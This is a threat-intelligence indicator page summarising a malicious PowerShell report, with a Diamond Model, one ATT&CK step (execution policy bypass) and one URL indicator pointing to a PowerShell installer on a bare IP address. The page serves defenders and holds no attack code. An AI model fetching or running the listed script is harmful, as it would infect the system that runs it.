IOC Radar
TLP:WHITE1 IOC

Malicious PowerShell Analysis

AP
APOPHIS
Published February 17, 2025Original Report

Diamond Model

SOCIAL AXISTECHNOLOGY AXISADVERSARYunknownINFRASTRUCTUREhttp://185.215.113.97…CAPABILITYunknownVICTIMunknown
Adversary
Infrastructure(1)
Capability
Victim

Attack Flow9 steps · MITRE ATT&CK mapped

Defense EvasionTA0005·T1548.001
1/9
Execution Policy Bypass
ActionBypass execution policy
The script bypasses the local execution policy to ensure it can run.

5W+H Threat Analysis

Analysis unavailable

Indicators of Compromise

Indicators of Compromise1

TypeIndicatorConfidenceScoreFirst Seen
URLhttp://185.215.113.97/files/anon/GeneratedInstaller.ps1.
intel-blognetworkurl
High
58
Jun 2, 26

IOC Relationship Graph

IOC Relationship Graph1 total IOCs
URL
URL1REPORTMalicious PowerShell Analy
scroll to zoom · drag to pan · click IOC to open